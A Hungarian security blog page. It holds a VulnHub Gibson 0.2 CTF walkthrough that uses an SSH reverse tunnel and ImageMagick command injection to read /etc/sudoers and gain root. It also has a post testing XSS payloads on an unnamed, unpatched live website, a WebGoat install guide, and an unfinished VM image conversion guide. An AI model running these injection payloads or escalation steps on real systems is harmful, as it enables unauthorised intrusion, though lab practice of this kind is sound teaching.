Remek móka volt! Köszönöm c4b3rw0lf!!! Thanks c4b3rw0lf !!! Ismét remekül szórakoztam… :)

VulnHub - Gibson 0.2

Mon, 16 May 2016 16:50:05 +0200

A régi szép időkből néha nosztalgikus hangulatban emlékszem a hajnalig tartó FPS game partikra, ahol az egyik kedvenc móka a CTF (Capture The Flag), vagyis a szerezd meg a zászlót típusú játékok voltak. Mára már a CTF mást jelent számomra. Az IT-s biztonság technika talán egyik legérdekesebb ága az Ethical Hacking. Ezen területen tevékenykedő kreatív emberek, rendszeresen kihívások elé állítják egymást és létre hoznak virtuális szervereket, amiket aztán a többieknek root-ra kell törni, a rajtuk futó szolgáltatások sebezhetőségét és saját találékonyságukat felhasználva és megszerezni a rendszeren elrejtett egy vagy több flag-et (zászlót). Az ilyen “cél” rendszerek egyik legnagyobb gyűjtőhelye a VulnHub. Mindig nagyon várom, hogy fel kerüljön egy új, törésre váró virtuális szerver. Hát tegnap felkerült a Gibson 0.2, knightmare jóvoltából, köszönet érte…

Információ gyűjtés

Lássuk milyen IP címet kapott a DHCP-től.

# netdiscover -i eth0 -r 192.168.10.0/24
Currently scanning: 192.168.10.0/24   |   Screen View: Unique Hosts              
                                                                                  
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 126                  
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.10.1    fe:54:00:0e:a4:ce      1      42  Unknown vendor                 
 192.168.10.222  52:54:00:c4:a4:12      1      42  Unknown vendor                 
 192.168.10.254  52:54:00:0e:a4:ce      1      42  Unknown vendor

Szóval az IP cím 192.168.10.222. Most lássuk a nyitott portokat és a futó szolgáltatásokat.

# nmap -sS -sV 192.168.10.222 -p1-65535

Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-16 15:58 CEST
Nmap scan report for 192.168.10.222 (192.168.10.222)
Host is up (0.0015s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7
MAC Address: 52:54:00:C4:A4:12 (QEMU virtual NIC)
Service Info: Host: gibson.example.co.uk; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.88 seconds

Van egy ssh a 22-es és egy Apache webszerver a 80-as porton. Mielőtt ránéznék böngészővel, elindítom a háttérben a nikto-t.

# nikto -host http://192.168.10.222
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.10.222
+ Target Hostname:    192.168.10.222
+ Target Port:        80
+ Start Time:         2016-05-15 20:38:53 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /: Directory indexing found.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ OSVDB-3268: /./: Directory indexing found.
+ OSVDB-3268: /?mod=node&nid=some_thing&op=view: Directory indexing found.
+ OSVDB-3268: /?mod=some_thing&op=browse: Directory indexing found.
+ /./: Appending '/./' to a directory allows indexing
+ OSVDB-3268: //: Directory indexing found.
...
...
+ 7535 requests: 0 error(s) and 46 item(s) reported on remote host
+ End Time:           2016-05-15 20:39:03 (GMT2) (10 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

A Directory indexing-en kívül semmi érdekes, lássuk böngészőből.

Egyetlen html fájl, de azért átnézem a forrást is (CTRL+U).

<head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="davinci.html">davinci.html</a></td><td align="right">2016-05-07 13:03  </td><td align="right">273 </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.7 (Ubuntu) Server at 192.168.10.222 Port 80</address>
</body></html>

Ezt is vártam :) Lássuk a davinci.html tartalmát először böngészőből.

… és most a forrást (CTRL+U)

<html>
<title>Gibson Mining Corporation</title>
<body>
<!-- Damn it Margo! Stop setting your password to "god" -->
<!-- at least try and use a different one of the 4 most -->
<!-- common ones! (eugene) -->
<h1> The answer you seek will be found by brute force</h1>
</body>

Ez már érdekesebb, főleg a Margo és a god :)

Szerezd meg a zászlót! 1. variáció

Próbáljunk belépni ssh-n margo felhasználóval és god jelszóval…

# ssh margo@192.168.10.222
The authenticity of host '192.168.10.222 (192.168.10.222)' can't be established.
ECDSA key fingerprint is SHA256:HFJkCohFeemJfEtUbrfcJdTBrirs7dQbPWF5ienVNhU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.10.222' (ECDSA) to the list of known hosts.
Ubuntu 14.04.3 LTS
margo@192.168.10.222's password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun May 15 19:29:13 BST 2016

  System load: 0.08              Memory usage: 5%   Processes:       93
  Usage of /:  82.2% of 1.85GB   Swap usage:   0%   Users logged in: 0

  => There is 1 zombie process.

  Graph this data and manage this system at:
    https://landscape.canonical.com/

#margo@gibson:~$ id
uid=1002(margo) gid=1002(margo) groups=1002(margo),27(sudo)

Hát ez sikerült :) Nézzük meg ki lakik még a rendszerben.

#margo@gibson:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
libvirt-qemu:x:106:106:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:107:111:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
duke:x:1000:1000:Duke Ellingson,,,:/home/duke:/bin/bash
colord:x:108:115:colord colour management daemon,,,:/var/lib/colord:/bin/false
eugene:x:1001:1001:Eugene Belford:/home/eugene:
margo:x:1002:1002:Margo Wallace:/home/margo:/bin/bash

Vagyis margo-n kívül van egy duke és egy eugene felhasználó. Ami még érdekes, az a libvirt-qemu. Szóval van kvm-qemu alapú virtualizáció is. Most lássuk a csoportokat.

#margo@gibson:~$ cat /etc/group
root:x:0:
...
sudo:x:27:margo,eugene
...
libvirtd:x:111:eugene
...
eugene:x:1001:eugene
margo:x:1002:
ssl-cert:x:116:

Láthatjuk, hogy a sudo csoportba csak margo és eugene tartozik, valamint eugene a libvirtd-be is. Látogassuk meg a home mappájukat és nézzünk körül.

#margo@gibson:~$ cd ..

#margo@gibson:/home$ ls -la
total 20
drwxr-xr-x  5 root   root   4096 May  5 18:49 .
drwxr-xr-x 22 root   root   4096 May  7 13:28 ..
drwxr-xr-x  7 duke   duke   4096 May  7 12:17 duke
drwxr-xr-x  6 eugene eugene 4096 May 14 14:31 eugene
drwxr-xr-x  7 margo  margo  4096 May 15 20:08 margo

#margo@gibson:/home$ cd duke

#margo@gibson:/home/duke$ ls -la
total 44
drwxr-xr-x 7 duke duke 4096 May  7 12:17 .
drwxr-xr-x 5 root root 4096 May  5 18:49 ..
-rw-r--r-- 1 duke duke  220 Apr 30 17:51 .bash_logout
-rw-r--r-- 1 duke duke 3637 Apr 30 17:51 .bashrc
drwx------ 2 duke duke 4096 Apr 30 16:56 .cache
drwx------ 3 duke duke 4096 May  4 20:03 .config
drwx------ 3 duke duke 4096 May  4 20:00 .dbus
drwx------ 3 duke duke 4096 May  4 20:01 .gconf
-rw-r--r-- 1 duke duke  675 Apr 30 17:51 .profile
-rw------- 1 root root  708 May  4 19:53 .viminfo
drwxr-x--x 2 duke duke 4096 May  4 20:00 .virt-manager

#margo@gibson:/home/duke$ cd ..

#margo@gibson:/home$ cd eugene/

#margo@gibson:/home/eugene$ ls -la
total 56
drwxr-xr-x 6 eugene eugene 4096 May 14 14:31 .
drwxr-xr-x 5 root   root   4096 May  5 18:49 ..
-rw-r--r-- 1 eugene eugene  220 Apr  9  2014 .bash_logout
-rw-r--r-- 1 eugene eugene 3637 Apr  9  2014 .bashrc
drwx------ 2 eugene eugene 4096 May  5 19:10 .cache
drwx------ 3 eugene eugene 4096 May  5 20:12 .dbus
drwx------ 3 eugene eugene 4096 May 14 14:22 .gconf
-rw-r--r-- 1 eugene eugene  675 Apr  9  2014 .profile
-rwxrwxr-x 1 eugene eugene 8589 May  5 19:10 spin64
-rw------- 1 root   root   4737 May 14 14:24 .viminfo
drwxr-x--x 2 eugene eugene 4096 May  5 20:12 .virt-manager

eugene mappájában találtam egy spin64 futtatható binárist. Talán még majd foglalkozok vele.

Nézzünk rá a hálózatra, ellenőrizzük a nyitott portokat, hátha valami elkerülte az nmap figyelmét.

#margo@gibson:/home/eugene$ netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 192.168.122.1:53        0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:6010          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:5900          0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 ::1:6010                :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
udp        0      0 192.168.122.1:53        0.0.0.0:*                           -               
udp        0      0 0.0.0.0:67              0.0.0.0:*                           -               
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               
udp        0      0 0.0.0.0:24299           0.0.0.0:*                           -               
udp6       0      0 :::52976                :::*                                -

Érdekes a 5900-as port ami egy VNC és ezt nem láthatta az nmap mert csak localhost-on figyel. Fussuk át az ssh beállításokat, csak a rend kedvéért.

#margo@gibson:~$ cat /etc/ssh/sshd_config | egrep -v ^$ | egrep -v ^#.*
Port 22
Protocol 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
UsePrivilegeSeparation yes
KeyRegenerationInterval 3600
ServerKeyBits 1024
SyslogFacility AUTH
LogLevel INFO
LoginGraceTime 120
StrictModes yes
RSAAuthentication yes
PubkeyAuthentication yes
IgnoreRhosts yes
RhostsRSAAuthentication no
HostbasedAuthentication no
PermitEmptyPasswords no
ChallengeResponseAuthentication no
PasswordAuthentication no
X11Forwarding yes
X11DisplayOffset 10
PrintMotd yes
PrintLastLog yes
TCPKeepAlive yes
Banner /etc/issue.net
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
UsePAM yes
PermitRootLogin no
AllowUsers eugene margo
Match user margo
PasswordAuthentication yes

Érdekesség, hogy az X11Forwarding engedélyezve van. Talán szükség lesz majd rá :) Nézzük meg a 5900-as portot közelebbről.

#margo@gibson:~$ telnet localhost 5900
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
RFB 003.008
Connection closed by foreign host.

RFB 003.008 tehát ez valóban egy nyitott VNC. Akkor próbáljuk meg kitunelezni a portot ssh-n keresztül a támadó gépre ami a 192.168.10.72 IP címen van.

#margo@gibson:~$ ssh -f root@192.168.10.72 -R 7777:localhost:5900 -N

Ha minden jó, márpedig úgy néz ki :) akkor a támadó gépről (192.168.10.72) mondjuk remmina segítségével a localhost:7777-re kapcsolódva bent is vagyunk a VNC-n.

… és

Úgy is lett. Egy szuper kis FreeDos 1.1 virtuális gép. Járjuk körbe, hátha találunk valamit.

A főgyökérben levő GARBAGE mappán kívül semmi érdekes.

Húzzuk csak át netcat segítségével a virtualhost-ra, majd onnan tovább a támadó gépre a fájlokat.

#margo@gibson:~$ nc -l 4444 > ADMINSP.JPG

… az egyiket

#margo@gibson:~$ nc -l 4444 > FLAG.IMG

… a másikat

#margo@gibson:~$ nc -l 4444 > JY_UG.ANS

… és a harmadikat is. Csomag vesztés miatt nem lettek teljesek a fájlok, de most ezzel nem futok fölös köröket, mert a második variációban majd leszedem máshogy is a fájlokat :)

És innen tovább a támadó gépre, ahol majd tovább elemezzük.

#margo@gibson:~$ ls -l
total 164
-rw-rw-r-- 1 margo margo 73185 May 16 00:29 ADMINSP.JPG
-rw-rw-r-- 1 margo margo 87902 May 16 00:30 FLAG.IMG
-rw-rw-r-- 1 margo margo  1577 May 16 00:32 JY_UG.ANS

#root@kali:~# scp margo@192.168.10.222:/home/margo/ADMINSP.JPG .
Ubuntu 14.04.3 LTS
margo@192.168.10.222 password: 
ADMINSP.JPG                                      100%   71KB  71.5KB/s   00:00    

#root@kali:~# scp margo@192.168.10.222:/home/margo/FLAG.IMG .
Ubuntu 14.04.3 LTS
margo@192.168.10.222 password: 
FLAG.IMG                                         100%   86KB  85.8KB/s   00:00    

#root@kali:~# scp margo@192.168.10.222:/home/margo/JY_UG.ANS .
Ubuntu 14.04.3 LTS
margo@192.168.10.222 password: 
JY_UG.ANS                                        100% 1577     1.5KB/s   00:00

De lássuk hogyan lehet ezt másképp csinálni :)

Szerezd meg a zászlót! 2. variáció

Az ssh-n keresztüli sikeres belépés után, kiderült, hogy margo a sudo csoport tagja. Lássuk mit tehet root jogosultsággal.

#margo@gibson:~$ sudo -l
Matching Defaults entries for margo on gibson:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User margo may run the following commands on gibson:
    (ALL) NOPASSWD: /usr/bin/convert

Szóval root jelszó nélkül futtathatja a /usr/bin/convert programot. De mi is ez a program?

#margo@gibson:~$ /usr/bin/convert -version
Version: ImageMagick 6.7.7-10 2014-03-06 Q16 http://www.imagemagick.org
Copyright: Copyright (C) 1999-2012 ImageMagick Studio LLC
Features: OpenMP

Érdekes. Az ImageMagick verziószáma alapján, több sebből vérzik link: https://www.exploit-db.com/exploits/39767/. Vagyis a /usr/bin/convert programmal lehet fájl műveleteket végrehajtani root jogosultsági szinten. Lássuk akkor a /etc/sudoers fájlt.

#margo@gibson:~$ sudo convert 'https://example.com"|cat "/etc/sudoers' out.png
[sudo] password for margo: 
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults	env_reset
Defaults	mail_badpass
Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root	ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
## disabled after Margo's security incident
##%sudo	ALL=(ALL:ALL) ALL

# Allow Margo to convert pictures from the FTP server
margo ALL=(ALL) NOPASSWD: /usr/bin/convert
# Allow eugene to manage virtual machines and visudo
eugene ALL=(ALL) NOPASSWD: /usr/bin/virt-manager 
eugene ALL=(ALL:ALL)  /usr/sbin/visudo 

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d

Úgy gondolom a /etc/sudoers.d mappába elhelyezett kiegészítő szabály elég lesz :) Készítsük elő a jogosultságszint emelést.

#margo@gibson:~$ echo "%sudo ALL=(ALL:ALL) ALL" > exploit

#margo@gibson:~$ cat exploit 
%sudo ALL=(ALL:ALL) ALL

Most az elkészült fájlt tegyük az /etc/sudoers.d/ mappába.

#margo@gibson:~$ sudo convert 'https://example.com"|cp exploit "/etc/sudoers.d/' out.png

#margo@gibson:~$ sudo convert 'https://example.com"|ls "/etc/sudoers.d' out.png[sudo] password for margo: 
exploit  README

És akkor lássuk, most hogy néz ki a jogosultságunk.

#margo@gibson:~$ sudo -l
Matching Defaults entries for margo on gibson:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User margo may run the following commands on gibson:
    (ALL) NOPASSWD: /usr/bin/convert
    (ALL : ALL) ALL

Jónak tűnik… … és legyünk root !!!

#margo@gibson:~$ sudo su -

#root@gibson:~# id && uname -a
uid=0(root) gid=0(root) groups=0(root)
Linux gibson 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

Nézzünk szét a root háza táján :)

#root@gibson:~# cd

#root@gibson:~# ls -la
total 20
drwx------  3 root root 4096 May  5 20:09 .
drwxr-xr-x 22 root root 4096 May 16 11:51 ..
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
drwxr-xr-x  2 root root 4096 May 14 14:01 .trash

#root@gibson:~# cd .trash/

#root@gibson:~/.trash# ls -la
total 8
drwxr-xr-x 2 root root 4096 May 14 14:01 .
drwx------ 3 root root 4096 May  5 20:09 ..

Semmi érdekes. Vizsgáljuk meg a virtuális gépet.

#root@gibson:~# virsh list --all
 Id    Name                           State
----------------------------------------------------
 2     ftpserv                        running

#root@gibson:~# cat /etc/libvirt/qemu/ftpserv.xml 
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh edit ftpserv
or other application using the libvirt API.
-->

<domain type='qemu'>
  <name>ftpserv</name>
  <uuid>ebcdaa6c-b10a-d758-c13a-0fb296b011f1</uuid>
  <memory unit='KiB'>262144</memory>
  <currentMemory unit='KiB'>262144</currentMemory>
  <vcpu placement='static'>1</vcpu>
...
      <source file='/var/lib/libvirt/images/ftpserv.img'/>
...
    </memballoon>
  </devices>
</domain>

Meg is van a gép virtuális meghajtója. Nézzük meg a fájlrendszerét.

#root@gibson:~/.trash# fdisk -l /var/lib/libvirt/images/ftpserv.img 
Disk /var/lib/libvirt/images/ftpserv.img: 536 MB, 536870912 bytes
16 heads, 63 sectors/track, 1040 cylinders, total 1048576 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00000000

                              Device Boot      Start         End      Blocks   Id  System
/var/lib/libvirt/images/ftpserv.img1   *          63     1048319      524128+   e  W95 FAT16 (LBA)

Állítsuk le a virtuális gépet és csatoljuk fel a fájlrendszerét, hogy rendesen leszedhessük a GARBAGE mappa fájljait.

#root@gibson:~/.trash# virsh shutdown ftpserv
Domain ftpserv is being shutdown

#root@gibson:/# losetup /dev/loop0 /var/lib/libvirt/images/ftpserv.img -o $((63 * 512))

#root@gibson:/# mount -t vfat /dev/loop0 /mnt

#root@gibson:/# cd /mnt

#root@gibson:/mnt# ls
AUTOEXEC.BAT  BOOTSECT.BIN  COMMAND.COM  DOS  FDCONFIG.SYS  GARBAGE  KERNEL.SYS  net

#root@gibson:/mnt# cd GARBAGE/

#root@gibson:/mnt/GARBAGE# ls -la
total 880
drwxr-xr-x 2 root root   8192 May  4 21:03 .
drwxr-xr-x 5 root root  16384 Jan  1  1970 ..
-rwxr-xr-x 1 root root 123141 May  4 21:17 adminspo.jpg
-rwxr-xr-x 1 root root 737280 May 14 13:19 flag.img
-rwxr-xr-x 1 root root   1601 Jun 11  2002 jz_ug.ans

Szóval így vagy úgy, de a fájlok megvannak :)

Vizsgáljuk meg a zsákmányt!

Miután átvittük a fájlokat a támadógépre, ott folytatjuk a vizsgálódást. Lássuk először az adminspo.jpg fájlt.

Most lássuk az EXIF adatokat.

#root@kali:~/Hack/Vulnhub_-_Gibson_0.2# exif -m adminspo.jpg 
Image Description	Rabbit.. Flu Shot... TYPE COOKE YOU IDIOT! I'll head them off at the pass
Date and Time	2016:05:04 22:29:32
Artist	Virtualization is fun.. What's more, esoteric OSes on 192.168.122 are even more fun
X-Resolution	72
Y-Resolution	72
Resolution Unit	Inch
User Comment	So there's info here.... Images, hmm... Wasn't that a CVE...? Oh yes... CVE 2016-3714

http://www.openwall.com/lists/oss-security/2016/05/03/18 so which person can run it. Perhaps the man who knew a lot about Sean Connery in Trainspotting when he wasn't  causing a 7 point drop in the NYSE
Exif Version	Exif Version 2.1
FlashPixVersion	FlashPix Version 1.0
Color Space	Internal error (unknown value 65535)

Hehe… utalások, utalások… A CVE 2016-3714 volt az ImageMagick sebezhetősége :) Most nézzük meg közelebbről a flag.img-t.

#root@gibson:~# file flag.img 
flag.img: Linux rev 1.0 ext2 filesystem data (mounted or unclean), UUID=d59bdd40-ec37-4d24-a956-80f549846121

#root@gibson:~# fdisk -l flag.img
Disk flag.img: 720 KiB, 737280 bytes, 1440 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

#root@gibson:~# mkdir flag

#root@gibson:~# mount -t ext2 /mnt/GARBAGE/flag.img flag

#root@gibson:~# cd flag/

#root@gibson:~/flag# ll
total 70
drwxr-xr-x 4 root root  1024 May 14 14:07 ./
drwx------ 4 root root  4096 May 16 12:37 ../
-rwxrwxr-x 1 root root 21358 Nov 16  2011 davinci*
-rw-r--r-- 1 root root 28030 Nov 16  2011 davinci.c
-rw-r--r-- 1 root root   159 May  5 19:56 hint.txt
drwx------ 2 root root 12288 May  5 19:39 lost+found/
drwxr-xr-x 2 root root  1024 May  5 20:07 .trash/

Érdekes, lássuk a hint.txt-t, majd nézzünk bele a .trash mappába is.

#root@gibson:~/flag# cat hint.txt 
http://www.imdb.com/title/tt0117951/ and
http://www.imdb.com/title/tt0113243/ have
someone in common... Can you remember his
original nom de plume in 1988...?

#root@gibson:~/flag# cd .trash/

#root@gibson:~/flag/.trash# ls -la
total 319
drwxr-xr-x 2 root root   1024 May  5 20:07 .
drwxr-xr-x 4 root root   1024 May 14 14:07 ..
---x------ 1 root root    469 May 14 14:18 flag.txt.gpg
-rw-r--r-- 1 root root 320130 Sep  7  2015 LeithCentralStation.jpg

Van még itt egy gpg titkosított fájl és ismét egy jpg. Vizsgáljuk meg először a képet.

Majd jöjjön az EXIF adata.

#root@kali:~# exif -m LeithCentralStation.jpg
X-Resolution	72
Y-Resolution	72
Resolution Unit	Inch
Exif Version	Exif Version 2.1
FlashPixVersion	FlashPix Version 1.0
Color Space	Internal error (unknown value 65535)

Visszatérő utalások a Trainspotting-ra és az 1988-as és 1995-ös Hackers-re. Már csak a gpg titkosított fájl van, de ez további vizsgálatot kíván…

#root@gibson:~# gpg --output txt --decrypt flag.txt.gpg 
gpg: CAST5 encrypted data
gpg: gpg-agent is not available in this session
gpg: encrypted with 1 passphrase
gpg: decryption failed: bad key

Lehet hogy az utalásokból ki lehetett volna találnom a passphrase-t, de majd talán nekifutok egyszer :)

Ismét köszönöm knightmare ezt a nagyszerű kihívást!!! Thanks [knightmare] !!! Remekül szórakoztam :)

XSS (Cross Site Scripting) sebezhetőség feltárás

Sun, 15 May 2016 15:29:09 +0200

A Cross Site Scripting (továbbiakban XSS)/link talán az egyik legtöbbször elkövetett fejlesztői hiba. Pedig a megtalálása általában egyszerű, bár akadnak bonyolultabb esetek is.

Nézzünk egy közepesen látogatott weboldalt. Az oldalt nem nevezem meg, mert a hibát még nem javították.

Keresés funkció az oldalon

Az oldal kereső mezőjébe írjunk be valamit (ha lehet, akkor olyan kifejezést, ami biztosan nem található az oldalon), pl azt hogy xss.

Ezen az oldalon, a keresés eredménye nem adott vissza semmit csak egy üres részt a találatok helyén. Se azt hogy nincs találat, se azt hogy van. Tekintsük meg az oldal forráskódját (CTRL+U) és keressük meg benne a xss kifejezésünket.

<div id="content_search">
 <form action="/kereses" method="get">
 <input type="text" name="search" class="input" value="xss" placeholder="Keresőszó"><input class="submit" type="submit" name="submit" value="Keresés">
 </form>
</div>

Meg is van, az input form value értéke tartalmazza a keresési kifejezésünket. Most próbáljunk meg kilépni az adatmezőből és az input form-ból. Írjuk a keresési mezőbe a xss"> kifejezést. Ha minden jól megy, akkor ebben az esetben a " lezárja az adat mezőt a kifejezés után, a > pedig az input form-ot.

Sikerült is. Láthatjuk, hogy az input form, value utáni része, így már kívül esik a form-on a html részre, amit a webszerver már sima szövegként jelenít meg. Nézzük meg, hogyan néz ki ez forráskód szinten (CTRL+U).

<div id="content_search">
 <form action="/kereses" method="get">
 <input type="text" name="search" class="input" value="xss">" placeholder="Keresőszó"><input class="submit" type="submit" name="submit" value="Keresés">
 </form>
</div>

Mivel itt már bizonyossá vált, hogy az oldal sebezhető, lássunk egy látványos alert(); beillesztést a résbe. A kereső mezőbe írjuk a xss"></form><script>alert("xss");</script> kifejezést.

A keresés eredménye pedig egy input form-on kívüli script futtatást eredményez, ami fel dob egy XSS alert ablakot.

Feliratkozás hírlevélre

Lehetséges támadási pont a keresés funkció mellett, a különböző adatbeviteli form-ok, pl. egy hírlevélre feliratkozás.

Próba képpen adjuk meg a Vezetéknév mezőben ismét a xss kifejezést. Mivel csak ezt a mezőt töltöttünk ki, így kapunk egy figyelmeztetést, a hiányos form-ról, ahol is a Vezetéknév mezőben ott a kifejezésünk.

Nézzük meg az oldal forráskódját és keressük meg a kifejezést.

<td class="input"><input type="text" name="form10" value="xss" class="text"></td>

Most ismét próbáljuk meg lezárni a value adatmezőt és az input form-ot, hogy a value értékadás mögötti rész, kiessen a html részre. Írjuk be a xss"> kifejezést a Vezetéknév mezőbe és lássuk mi történik.

Sikerült az input form-ot lerövidíteni és a mögöttes részt kitolni a html részre. Nézzük meg, hogyan is néz ez ki a forráskódban (CTRL+U).

<td class="input"><input type="text" name="form10" value="xss">" class="text"></td>

Most már csak az ismert alert(); beillesztése van hátra a vizsgálat befejezéséhez. Beírjuk a xss"><script>alert("xss");</script> kifejezést a Vezetéknév mezőbe.

Az eredmény ismét egy látványos XSS felugró ablak, vagyis a form sebezhető!

Ha az oldal nem statikus lenne, akkor a sebezhetőséget kihasználva akár php kód is futtatható lenne a biztonsági résen keresztül. Az Cross Site Scripting (XSS) sebezhetőség és a form-ok rései könnyen kihasználhatóak, megelőzni a beviteli mezők megfelelő filterezésével lehetséges.

WebGoat telepítése Debian 8.3-ra

Wed, 30 Mar 2016 22:24:52 +0200

A WebGoat egy java-ban írt web applikáció, kifejezetten sérülékenység vizsgálatra etikus hekkereknek. Segítségével feltárható és megismerhető pár sebezhetőség és kihasználásuknak a módja. Pl.

Cross-site scripting (XSS)
Access Control
Thread Safety
Hidden Form Field Manipulation
Parameter Manipulation
Weak Session Cookies
Blind SQL Injection
Numeric SQL Injection
String SQL Injection
Web Services
Fail Open Authentication
Dangers of HTML Comments
… stb

Telepítés

Vegyünk egy teljesen alap telepítésű Debian 8.3-at. Semmi extra, maximum egy openssh, hogy ssh-n keresztül hozzáférjünk.

# apt-get install openssh-server

A WebGoat-nak semmi másra nincs szüksége, mint egy Java JRE futtató környezetre, telepítsük tehát és ellenőrizzük.

# apt-get install default-jre
...
# java -version
java version "1.7.0_95"
OpenJDK Runtime Environment (IcedTea 2.6.4) (7u95-2.6.4-1~deb8u1)
OpenJDK Client VM (build 24.95-b01, mixed mode, sharing)

Készítsünk neki egy tetszés szerinti mappát.

# mkdir webgoat

Most töltsük le a legfrissebb WebGoat-ot, ami jelenleg a 7.0.1 az elkészített mappába.

# cd webgoat
# wget https://github.com/WebGoat/WebGoat/releases/download/7.0.1/webgoat-container-7.0.1-war-exec.jar

Ezek után nincs más hátra mint elindítani.

# java -jar webgoat-container-7.0.1-war-exec.jar

Ha mindent jól csináltunk, akkor a böngészőnkbe beírva a http://<ip cím>:8080/WebGoat címet már láthatjuk is a kezdő oldalát.

Illetve belépés után a főképernyőt.

OVA, VMDK vagy VDI fájl importálása KVM alá

Sun, 20 Mar 2016 15:48:56 +0100

Az OVA (Open Virtualization Archive) fájl az egy tömörített virtuális gép. A VMDK (Virtual Machine Disk) )a VMware virtuális diszk formátuma. A VDI (VirtualBox Disk Image) pedig az Oracle VirtualBox diszk formátuma. Ha KVM alá szeretnénk ezeket felcsatolni, akkor ezt nagyon könnyen megtehetjük. Vizsgáljuk meg először is az OVA fájlunkat.

# file SmashTheTux.ova 
SmashTheTux.ova: POSIX tar archive (GNU)

Ebből látszik, hogy az OVA fájl, nem más mint egy tar archív. Csomagoljuk szépen ki.

# tar xfv SmashTheTux.ova 
SmashTheTux.ovf
SmashTheTux-disk1.vmdk

Most lássuk mi volt a csomagban.

# file SmashTheTux*
SmashTheTux-disk1.vmdk: VMware4 disk image
SmashTheTux.ova:        POSIX tar archive (GNU)
SmashTheTux.ovf:        XML document text

Van egy ovf fájl, ami xml formátumban írja le a virtuális gép beállításait. Ez most nem igazán érdekel minket, maximum annyira, hogy milyen paraméterei (CPU, MEM … stb) voltak az eredeti gépnek és ehhez mérten állítjuk be a KVM-be az új virtuális gépünket. Az érdekesebb igazából a vmdk fájl. Ez a virtuális gép diszkje. A qemu-kvm már a 0.12-es verziótól támogatja natívan a VMware diszkeket, de én inkább a qcow2 formátumot ajánlom. Ehhez nem kell mást tenni, mint a vmdk fájlból qcow2 formátumút kell készítenünk a következő utasítással.

